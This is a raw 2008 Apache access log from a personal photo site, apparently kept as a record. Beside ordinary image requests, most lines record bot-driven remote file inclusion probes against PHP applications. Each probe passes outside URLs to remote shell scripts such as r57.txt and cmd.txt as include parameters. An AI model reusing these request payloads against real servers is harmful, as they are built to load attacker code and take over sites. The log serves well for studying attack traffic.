88.23.215.15 - - [22/Aug/2008:01:47:50 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:50 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:50 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:50 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:51 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:51 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:51 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:51 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:52 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:52 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:52 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:52 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
89.108.67.192 - - [22/Aug/2008:01:48:43 -0500] "GET /logs/access_log.1206230400//appserv/main.phphttp://geocities.com/clara_chissa/inject.txt?? HTTP/1.1" 404 372 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:01:48:44 -0500] "GET //appserv/main.phphttp://geocities.com/clara_chissa/inject.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:01:48:44 -0500] "GET /logs//appserv/main.phphttp://geocities.com/clara_chissa/inject.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.812"
202.70.83.4 - - [22/Aug/2008:01:53:17 -0500] "GET /logs//main.php?sayfa=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
202.70.83.4 - - [22/Aug/2008:01:53:18 -0500] "GET //main.php?sayfa=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
66.7.193.54 - - [22/Aug/2008:01:59:54 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
66.7.193.54 - - [22/Aug/2008:01:59:54 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
74.52.66.242 - - [22/Aug/2008:02:01:31 -0500] "GET /logs/errors.php?error=http://bl4ckb0t.co.cc/file/r57.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
74.52.66.242 - - [22/Aug/2008:02:01:31 -0500] "GET /errors.php?error=http://bl4ckb0t.co.cc/file/r57.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
66.7.193.54 - - [22/Aug/2008:02:02:03 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
151.11.24.250 - - [22/Aug/2008:02:02:16 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dogshop.at/language/osid6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
151.11.24.250 - - [22/Aug/2008:02:02:16 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dogshop.at/language/osid6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
67.19.6.34 - - [22/Aug/2008:02:02:18 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
74.55.136.66 - - [22/Aug/2008:02:03:36 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:02:03:36 -0500] "GET //?path%5Bdocroot%5D=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:02:03:36 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 200 96221 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:02:04:04 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 200 96221 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:02:04:04 -0500] "GET //?path%5Bdocroot%5D=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
67.19.6.34 - - [22/Aug/2008:02:05:36 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
67.19.6.34 - - [22/Aug/2008:02:05:36 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
218.38.54.160 - - [22/Aug/2008:02:08:34 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
66.135.41.76 - - [22/Aug/2008:02:08:46 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
66.135.41.76 - - [22/Aug/2008:02:08:46 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
220.73.137.93 - - [22/Aug/2008:02:09:17 -0500] "GET /logs/access_log.1208044800/admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:02:09:17 -0500] "GET /admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:02:09:18 -0500] "GET /logs/admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
80.237.154.39 - - [22/Aug/2008:02:10:42 -0500] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 294 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
80.237.154.39 - - [22/Aug/2008:02:10:42 -0500] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 299 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
220.73.137.93 - - [22/Aug/2008:02:11:42 -0500] "GET /logs/access_log.1208044800/admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:02:11:42 -0500] "GET /admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:02:11:43 -0500] "GET /logs/admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
69.16.207.46 - - [22/Aug/2008:02:12:50 -0500] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
69.16.207.46 - - [22/Aug/2008:02:12:50 -0500] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
125.24.35.190 - - [22/Aug/2008:02:13:32 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dogshop.at/language/osid6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
125.24.35.190 - - [22/Aug/2008:02:13:32 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dogshop.at/language/osid6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
80.77.37.118 - - [22/Aug/2008:02:13:39 -0500] "GET /logs//?path%5Bdocroot%5D=http://secret-wishes.net/images/t.txt?????????????? HTTP/1.1" 200 96221 "-""libwww-perl/5.803"
80.77.37.118 - - [22/Aug/2008:02:13:40 -0500] "GET //?path%5Bdocroot%5D=http://secret-wishes.net/images/t.txt?????????????? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
66.135.41.76 - - [22/Aug/2008:02:14:03 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
66.135.41.76 - - [22/Aug/2008:02:14:03 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
220.73.137.93 - - [22/Aug/2008:02:15:49 -0500] "GET /logs/admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:02:15:50 -0500] "GET /admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
79.170.40.180 - - [22/Aug/2008:02:15:51 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
79.170.40.180 - - [22/Aug/2008:02:15:51 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:02:15:59 -0500] "GET /logs/admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:02:15:59 -0500] "GET /admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
67.212.173.42 - - [22/Aug/2008:02:16:10 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
67.212.173.42 - - [22/Aug/2008:02:16:11 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
67.236.143.248 - - [22/Aug/2008:02:17:21 -0500] "GET //atom.php5?page=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
218.189.215.153 - - [22/Aug/2008:02:17:54 -0500] "GET /logs/admin/editor2/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.0" 404 301 "-""libwww-perl/5.805"
218.189.215.153 - - [22/Aug/2008:02:17:55 -0500] "GET /admin/editor2/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.0" 404 296 "-""libwww-perl/5.805"
207.70.164.156 - - [22/Aug/2008:02:18:14 -0500] "GET /logs/access_log.1213401600//phpsecurityadmin/include/logout.php?PSA_PATH=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
207.70.164.156 - - [22/Aug/2008:02:18:14 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
207.70.164.156 - - [22/Aug/2008:02:18:15 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
85.159.91.143 - - [22/Aug/2008:02:18:44 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:02:18:44 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:02:18:46 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:02:18:46 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
77.222.40.49 - - [22/Aug/2008:02:20:39 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
77.222.40.49 - - [22/Aug/2008:02:20:39 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.159.91.143 - - [22/Aug/2008:02:20:59 -0500] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:02:20:59 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:02:21:00 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:02:21:00 -0500] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:02:21:01 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:02:21:01 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.52.99.98 - - [22/Aug/2008:02:22:27 -0500] "GET //?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
74.52.99.98 - - [22/Aug/2008:02:22:27 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
74.52.99.98 - - [22/Aug/2008:02:22:27 -0500] "GET /logs//?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 200 96221 "-""libwww-perl/5.810"
207.70.164.156 - - [22/Aug/2008:02:22:28 -0500] "GET /logs/access_log.1214524800//phpsecurityadmin/include/logout.php?PSA_PATH=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
66.7.193.54 - - [22/Aug/2008:02:23:49 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
66.7.193.54 - - [22/Aug/2008:02:23:49 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
66.7.193.54 - - [22/Aug/2008:02:23:49 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
77.222.40.49 - - [22/Aug/2008:02:23:58 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
77.222.40.49 - - [22/Aug/2008:02:23:58 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.9.63.18 - - [22/Aug/2008:02:24:05 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 338 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.9.63.18 - - [22/Aug/2008:02:24:06 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 343 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.17.129.24 - - [22/Aug/2008:02:24:16 -0500] "GET /logs/!scanhttp://illeganza.altervista.org/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
201.17.129.24 - - [22/Aug/2008:02:24:19 -0500] "GET /!scanhttp://illeganza.altervista.org/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
67.212.173.42 - - [22/Aug/2008:02:25:41 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
67.212.173.42 - - [22/Aug/2008:02:25:41 -0500] "GET ///vwar/backup/errors.php?error=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
67.212.173.42 - - [22/Aug/2008:02:25:41 -0500] "GET /logs///vwar/backup/errors.php?error=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
66.7.193.54 - - [22/Aug/2008:02:25:53 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
193.178.147.89 - - [22/Aug/2008:02:26:35 -0500] "GET /logs/access_log.1208044800/admin/editor2/errors.php?error=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
193.178.147.89 - - [22/Aug/2008:02:26:35 -0500] "GET /admin/editor2/errors.php?error=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
193.178.147.89 - - [22/Aug/2008:02:26:36 -0500] "GET /logs/admin/editor2/errors.php?error=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
151.11.24.250 - - [22/Aug/2008:02:26:44 -0500] "GET /logs/access_log.1206230400%20//?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
151.11.24.250 - - [22/Aug/2008:02:26:45 -0500] "GET //?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
151.11.24.250 - - [22/Aug/2008:02:26:53 -0500] "GET /logs//?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 200 36689 "-""libwww-perl/5.79"
67.212.173.42 - - [22/Aug/2008:02:26:55 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
81.9.63.18 - - [22/Aug/2008:02:27:19 -0500] "GET /errors.php?error=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.9.63.18 - - [22/Aug/2008:02:27:19 -0500] "GET /logs/errors.php?error=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.19.6.34 - - [22/Aug/2008:02:27:58 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
67.19.6.34 - - [22/Aug/2008:02:27:59 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
67.19.6.34 - - [22/Aug/2008:02:27:59 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
66.7.193.54 - - [22/Aug/2008:02:28:10 -0500] "GET /logs/access_log.1214179200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
74.52.99.98 - - [22/Aug/2008:02:28:30 -0500] "GET /logs/access_log.1206230400%20//?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
200.11.67.242 - - [22/Aug/2008:02:28:36 -0500] "GET /logs/errors.php?error=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
200.11.67.242 - - [22/Aug/2008:02:28:39 -0500] "GET /errors.php?error=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
79.170.40.180 - - [22/Aug/2008:02:28:50 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
79.170.40.180 - - [22/Aug/2008:02:28:51 -0500] "GET ///vwar/backup/errors.php?error=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
79.170.40.180 - - [22/Aug/2008:02:28:51 -0500] "GET /logs///vwar/backup/errors.php?error=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
74.52.99.98 - - [22/Aug/2008:02:29:06 -0500] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
74.52.99.98 - - [22/Aug/2008:02:29:06 -0500] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
74.52.99.98 - - [22/Aug/2008:02:29:06 -0500] "GET /logs/access_log.1206230400//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
74.52.139.226 - - [22/Aug/2008:02:29:12 -0500] "GET /logs/admin/editor2/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
74.52.139.226 - - [22/Aug/2008:02:29:12 -0500] "GET /admin/editor2/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
79.170.40.180 - - [22/Aug/2008:02:29:54 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
84.132.162.83 - - [22/Aug/2008:02:32:33 -0500] "GET /rachel%20study HTTP/1.1" 301 338 "http://de.images.search.yahoo.com/images/view?back=http%3A%2F%2Fde.images.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Drachel%2Bpregnant%26ni%3D20%26ei%3DUTF-8%26fr%3Dmoz2%26xargs%3D0%26pstart%3D1%26b%3D441&w=393&h=500&imgurl=tomdolan.pconline.com%2Frachel%2520study%2Frachel-12a.jpg&rurl=http%3A%2F%2Ftomdolan.pconline.com%2Frachel%2520study&size=57.3kB&name=rachel-12a.jpg&p=rachel+pregnant&type=JPG&oid=d1ed0ffd76b0ae34&no=448&tt=1.285&sigr=11b9h03jl&sigi=11j5o0bne&sigb=13f6tv17h""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:34 -0500] "GET /rachel%20study/ HTTP/1.1" 200 6339 "http://de.images.search.yahoo.com/images/view?back=http%3A%2F%2Fde.images.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Drachel%2Bpregnant%26ni%3D20%26ei%3DUTF-8%26fr%3Dmoz2%26xargs%3D0%26pstart%3D1%26b%3D441&w=393&h=500&imgurl=tomdolan.pconline.com%2Frachel%2520study%2Frachel-12a.jpg&rurl=http%3A%2F%2Ftomdolan.pconline.com%2Frachel%2520study&size=57.3kB&name=rachel-12a.jpg&p=rachel+pregnant&type=JPG&oid=d1ed0ffd76b0ae34&no=448&tt=1.285&sigr=11b9h03jl&sigi=11j5o0bne&sigb=13f6tv17h""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
